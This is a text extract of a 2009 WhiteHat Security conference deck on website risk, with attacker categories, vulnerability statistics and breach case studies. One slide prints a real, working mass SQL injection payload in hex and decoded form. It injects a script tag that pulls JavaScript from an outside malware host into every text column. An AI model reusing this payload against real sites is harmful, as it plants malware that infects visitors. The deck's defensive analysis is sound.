SlideShare une entreprise Scribd logo
1  sur  33
Télécharger pour lire hors ligne
Security Religions
& Risk Windows

                        Jeremiah Grossman
            Founder & Chief Technology Officer

                                             2009



                                 © 2009 WhiteHat, Inc.
Jeremiah Grossman
• Technology R&D and industry evangelist
  (InfoWorld's CTO Top 25 for 2007)
• Frequent international conference speaker
• Co-founder of the Web Application Security Consortium
• Co-author: Cross-Site Scripting Attacks
• Former Yahoo! information security officer




                                                     © 2009 WhiteHat Security, Inc. | Page   2
WhiteHat Security
• 250+ enterprise customers
 •Start-ups to Fortune 500
• Flagship offering “WhiteHat Sentinel Service”
 •1000’s of assessments performed annually
• Recognized leader in website security
 •Quoted thousands of times by the mainstream press




                                                      © 2009 WhiteHat, Inc. | Page 3
WhiteHat Sentinel
Complete Website Vulnerability Management
Customer Controlled & Expert Managed

• Unique SaaS-based solution – Highly scalable delivery of service
  at a fixed cost
• Production Safe – No Performance Impact
• Full Coverage – On-going testing for business logic flaws and
  technical vulnerabilities – uses WASC 24 classes of attacks as
  reference point
• Unlimited Assessments – Anytime websites change
• Eliminates False Positives – Security Operations Team verifies all
  vulnerabilities
• Continuous Improvement & Refinement – Ongoing updates and
  enhancements to underlying technology and processes




                                                                       © 2009 WhiteHat, Inc. | Page 4
Attacker Targeting
Random Opportunistic
• Fully automated scripts
• Unauthenticated scans
• Targets chosen indiscriminately

Directed Opportunistic
• Commercial and Open Source Tools
• Authentication scans
• Multi-step processes (forms)

Fully Targeted
• Customize their own tools
• Focused on business logic
• Clever and profit driven ($$$)



                                     © 2009 WhiteHat, Inc. | Page 5
How the breach was detected:
• 3rd party detection due to FRAUD (55%)
• 3rd party detection NOT due to fraud (15%)
• Employee Discovery (13%)
• Unusual System Performance (11%)
                                      http://securityblog.verizonbusiness.com/2009/04/15/2009-dbir/
Mass SQL Injection
• Google recon for weak websites (*.asp, *.php)
• Generic SQL Injection populates databases with malicious
 JavaScript IFRAMEs
 •(now over 2 million sites infected)
• Visitors arrive and their browser auto-connects to a malware
 server infecting their machine with trojans -- or the website is
 damaged and can no longer conduct business.
• Botnets form then continue SQL injecting websites
• Infected sites risk becoming blacklisted on search engines
 and Web filtering gateways causing loss of visitors




                                                         © 2009 WhiteHat, Inc. | Page 7
"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=cast
(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5
220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973
6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6
22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39
39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206
22E78747970653D31363729204F50454E205461626C655F437572736F722046455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B2
72B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D226874
74703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F736
3726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520
272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F736
46F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C
212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736
F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F
72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 200 6338 "-"




 Decoded...       DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
                  select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
                  and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor
                  FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
                  BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.
                  1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script
                  src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM
                  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor



                                                                               © 2009 WhiteHat, Inc. | Page 8
?
                                                                    =                                   Hacker 1

                                                                             Albert "Segvec" Gonzalez
Victims                                        Techniques
TJ Maxx                                        SQL Injection
Barnes & Noble                                 Sniffers
BJ’s Wholesale                                 Wireless Security / War Driving
Boston Market                                  Shared Passwords
                                                                                                        Hacker 2
DSW Shoe Warehouse                             Malware
Forever 21                                     Anti-Forensics
Office Max                                     Backdoors
Sports Authority                               Social Engineering
Heartland Payment Systems
Hannaford Brothers
7-Eleven
Dave and Busters

http://www.wired.com/threatlevel/2009/08/tjx-hacker-charged-with-heartland/
http://government.zdnet.com/?p=5242
http://www.washingtonpost.com/wp-dyn/content/article/2009/08/17/AR2009081701915.html?hpid=sec-tech
Business Goals & Budget Justification
Risk Mitigation
"If we spend $X on Y, we’ll reduce of risk of loss of $A by B%."

Due Diligence
"We must spend $X on Y because it’s an industry best-practice."

Incident Response
"We must spend $X on Y so that Z never happens again."

Regulatory Compliance
"We must spend $X on Y because <insert regulation> says so."

Competitive Advantage
"We must spend $X on Y to make the customer happy."




                                                       © 2009 WhiteHat, Inc. | Page 10
Security Religions

                     Depth



 Breadth


                       © 2009 WhiteHat, Inc. | Page 11
WhiteHat Sentinel Statistics
Data Set
• Software-as-a-Service Website Vulnerability Assessment
• Weekly testing for business logic flaws and technical vulnerabilities
• Collection duration: January 1, 2006 to March 31, 2009
• Total websites: 1,031
• Identified vulnerabilities: 17,888

Key Findings
• Unresolved vulnerabilities: 7,157 (60% resolution rate)
• Websites having had at least one HIGH, CRITICAL, or URGENT issue: 82%
• Lifetime average number of vulnerabilities per website: 17
• Websites currently with at least one HIGH, CRITICAL, or URGENT issue: 63%
• Current average of unresolved vulnerabilities per website: 7



    Percentage likelihood of a website having a
    vulnerability by severity

                                                  CRITICAL                  HIGH
                                 URGENT
                                                                   © 2009 WhiteHat, Inc. | Page 12
Website Classes of Attacks
Business Logic: Humans Required       Technical: Automation Can Identify
Authentication                        Command Execution
• Brute Force                         • Buffer Overflow
• Insufficient Authentication         • Format String Attack
• Weak Password Recovery Validation   • LDAP Injection
• CSRF*                               • OS Commanding
                                      • SQL Injection
Authorization                         • SSI Injection
• Credential/Session Prediction       • XPath Injection
• Insufficient Authorization
• Insufficient Session Expiration     Information Disclosure
• Session Fixation                    • Directory Indexing
                                      • Information Leakage
Logical Attacks                       • Path Traversal
• Abuse of Functionality              • Predictable Resource Location
• Denial of Service
• Insufficient Anti-automation        Client-Side
• Insufficient Process Validation     • Content Spoofing
                                      • Cross-site Scripting
                                      • HTTP Response Splitting*

                                                           © 2009 WhiteHat, Inc. | Page 13
WhiteHat Security Top Ten
             Percentage likelihood of a website having
                     a vulnerability by class

                               Cross-Site Scripting
                               Information Leakage
                               Content Spoofing
                               Insufficient Authorization
                               SQL Injection
                               Predictable Resource Location
                               Session Fixation
                               Cross-Site Request Forgery
                               Insufficient Authentication
                               HTTP Response Splitting




                                           © 2009 WhiteHat, Inc. | Page 14
Time-to-Fix (Days)
Cross-Site Scripting

Information Leakage

Content Spoofing

Insufficient Authorization

SQL Injection

Predictable Resource Location

Session Fixation

Cross-Site Request Forgery

Insufficient Authentication

HTTP Response Splitting


      Best-case scenario: Not all vulnerabilities have been fixed...



                                                        © 2009 WhiteHat, Inc. | Page 15
Resolution Rate - By Class
            Class of Attack      % resolved   severity
 Cross Site Scripting               20%        urgent
 Insufficient Authorization         19%        urgent
 SQL Injection                      30%        urgent
 HTTP Response Splitting            75%        urgent
 Directory Traversal                53%        urgent
 Insufficient Authentication        38%        critical
 Cross-Site Scripting               39%        critical
 Abuse of Functionality             28%        critical
 Cross-Site Request Forgery         45%        critical
 Session Fixation                   21%        critical
 Brute Force                        11%         high
 Content Spoofing                   25%         high
 HTTP Response Splitting            30%         high
 Information Leakage                29%         high
 Predictable Resource Location      26%         high




                                                   © 2009 WhiteHat, Inc. | Page 16
Holiday Grinch-bots
eBay’s "Holiday Doorbusters" promotion, administered by Strobe
Promotions, was giving away 1,000 items -- 2009 corvette, plasma
TVs, jet skis, diamond ring, etc -- to the first person to find and buy
specially-marked $1 items.

Some "contestants" used scripts, skipping to 'buy', without even
viewing the goods. Almost 100% of the prizes were 'won' this way
as evidenced by the visitor counters showing "0000."


Many were not happy and complaining in the forums. Disappointed
with eBays response, some took matters into their their owns hands
listing "other" items for $1.

"This is picture I took of my cat with my Cannon Powershot Camera
after she overheard that people where using scripting to purchase
HOLIDAY DOORBUSTERS items on eBay. Not responsible for poor
scripting techniques."


                                                    http://redtape.msnbc.com/2008/12/ebay-users-say.html



                                                                              © 2009 WhiteHat, Inc. | Page 17
“The most secure email
accounts on the planet”
To get into a StrongWebmail account, the account owner must
receive a verification call on their phone. This means that even if
your password is stolen, the thief can’t access your email
because they don’t have access to your telephone.




                                                  http://www.strongwebmail.com/




                                                         © 2009 WhiteHat, Inc. | Page 18
Break into my email: get $10,000.
Here is my username and password.
May 21, 2009

Break into my email: get $10,000. Here is my username and password.
Username: CEO@StrongWebmail.com
Password: Mustang85

StrongWebmail.com is offering $10,000 to the first
person that breaks into our CEO’s StrongWebmail
email account. And to make things easier, Strong
Webmail is giving the username and password away!

                                    http://www.strongwebmail.com/news/secure-web-mail/break-into-my-
                                    email-get-10000-here-is-my-username-and-password/




                                                                        © 2009 WhiteHat, Inc. | Page 19
Lance James

               TwitPwn

Aviv Raff
                http://twitpwn.com/




Mike Bailey
              http://www.asscert.com/




                  © 2009 WhiteHat, Inc. | Page 20
The easiest route
1) Registered an account and identified multiple XSS issues in a
matter of minutes (Rackspace WebMail software).
2) Sent ceo@strongwebmail.com an email laced with specially
crafted JavaScript malware
3) Emailed support@strongwebmail.com stating they won the
contest and sent details to the CEO encouraging them to check
the account.
4) Within minutes the email were opened, which initiated several
Ajax requests to the server, pilfering the inbox, and sending the
data to a remote logging script.


                         http://skeptikal.org/2009/06/strongwebmail-contest-won.html
                         http://www.fireblog.com/exclusive-interview-with-strongwebmails-10000-hacker/



                                                                                   © 2009 WhiteHat, Inc. | Page 21
The easiest route




                    © 2009 WhiteHat, Inc. | Page 22
The easiest route




                    © 2009 WhiteHat, Inc. | Page 23
StrongWebmail said it was "not deterred" by the contest's
quick conclusion and would be launching a new
competition once this bug was fixed. "We won't rest until
we have created the most secure e-mail in the world," the
company said.

                                              © 2009 WhiteHat, Inc. | Page 24
Twitter Hacker
Hacker Croll initiates a password recovery for a Twitter
employee’s Gmail account. Reset email to secondary
account: ******@h******.com.
Guesses secondary Hotmail account, deactivated, but is able
to re-register the account. Resends the reset email and bingo.

Pilfers inbox for passwords to other Web services, sets the
Gmail password to the original so employee would not notice.

Used the same password to compromise employee's email
on Google Apps, steal hundreds of internal documents, and                                        Owned!
access Twitter's domains at GoDaddy. Sent to TechCrunch.

Personal AT&T, MobileMe, Amazon, iTunes and other accounts
accessed using username/passwords and password recovery
systems.
                                        “I’m sorry” - Hacker Croll
                              http://www.techcrunch.com/2009/07/19/the-anatomy-of-the-twitter-attack/



                                                                                      © 2009 WhiteHat, Inc. | Page 25
Trading on Semi-public Information
Business Wire provides a service where registered website users receive a
stream of up-to-date press releases. Press releases are funneled to Business
Wire by various organizations, which are sometimes embargoed temporarily
because the information may affect the value of a stock.
Press release files are uploaded to the Web server (Business Wire), but not
linked, until the embargo is lifted. At such time, the press release Web pages
are linked into the main website and users are notified with URLs similar to
the following:
http://website/press_release/08/29/2007/00001.html
http://website/press_release/08/29/2007/00002.html
http://website/press_release/08/29/2007/00003.html
Before granting read access to the press release Web page, the system
ensures the user is properly logged-in.



                                                               © 2009 WhiteHat, Inc. | Page   26
Just because you can't see it doesn't mean it's
not there.

An Estonian financial firm, Lohmus Haavel & Viisemann, discovered that
the press release Web page URLs were named in a predictable fashion.

And, while links might not yet exist because the embargo was in place, it
didn’t mean a user couldn’t guess at the filename and gain access to the
file. This method worked because the only security check Business
Wire conducted was to ensure the user was properly logged-in,
nothing more.

According to the SEC, which began an investigation, Lohmus Haavel &
Viisemann profited over $8 million by trading on the information they
obtained.




                                                             © 2009 WhiteHat, Inc. | Page   27
A Ukrainian hacker breaks into Thomson Financial
and steals a gloomy results announcement for IMS
Health, hours before its release to the stock market ...
• Hacker enters ~$42,000 in sell orders betting the stock will fall
• The stock fell sharply making the hacker ~$300,000
• Red flags appear and the SEC freezes the funds
• Funds are ordered to be released, “Dorozhko’s alleged ‘stealing and
 trading’ or ‘hacking and trading’ does not amount to a violation” of
 securities laws, Judge Naomi Reice Buchwald
• The Times speculates that the DoJ has simply deemed the case not worth
 pursuing - probably due to the difficulties involved in gaining cooperation
 from local authorities to capture criminals in Ukraine.




                                                               © 2009 WhiteHat, Inc. | Page   28
Attack Classification Misnomer
Dial is a measurement of target focus, NOT skill.




                                             © 2009 WhiteHat, Inc. | Page 29
Operationalizing
1) Where do I start?
Locate the websites you are responsible for

2) Where do I do next?
Rank websites based upon business criticality

3) What should I be concerned about first?      Risk
Random Opportunistic, Directed Opportunistic, Fully
Targeted

4) What is our current security posture?
Vulnerability assessments, pen-tests, traffic
monitoring                                                        Resources

                                                       What is your organizations tolerance
5) How best to improve our survivability?                     for risk (per website)?
SDL, virtual patch, configuration change,
decommission, outsource, version roll-back, etc.




                                                                    © 2009 WhiteHat, Inc. | Page 30
Operational Website Risk Management




                                      © 2009 WhiteHat, Inc. | Page 31
© 2009 WhiteHat, Inc. | Page 32
Thank You!
Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Twitter: http://twitter.com/jeremiahg
Email: jeremiah@whitehatsec.com

WhiteHat Security
http://www.whitehatsec.com/




                                              © 2009 WhiteHat, Inc.

Contenu connexe

Plus de Jeremiah Grossman

Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Jeremiah Grossman
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
11th Website Security Statistics -- Presentation Slides (Q1 2011)
11th Website Security Statistics -- Presentation Slides (Q1 2011)11th Website Security Statistics -- Presentation Slides (Q1 2011)
11th Website Security Statistics -- Presentation Slides (Q1 2011)Jeremiah Grossman
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 

Plus de Jeremiah Grossman (20)

Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
Web Breaches in 2011-“This is Becoming Hourly News and Totally Ridiculous"
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
11th Website Security Statistics -- Presentation Slides (Q1 2011)
11th Website Security Statistics -- Presentation Slides (Q1 2011)11th Website Security Statistics -- Presentation Slides (Q1 2011)
11th Website Security Statistics -- Presentation Slides (Q1 2011)
 
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeRich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 

Dernier

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 

Dernier (20)

The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
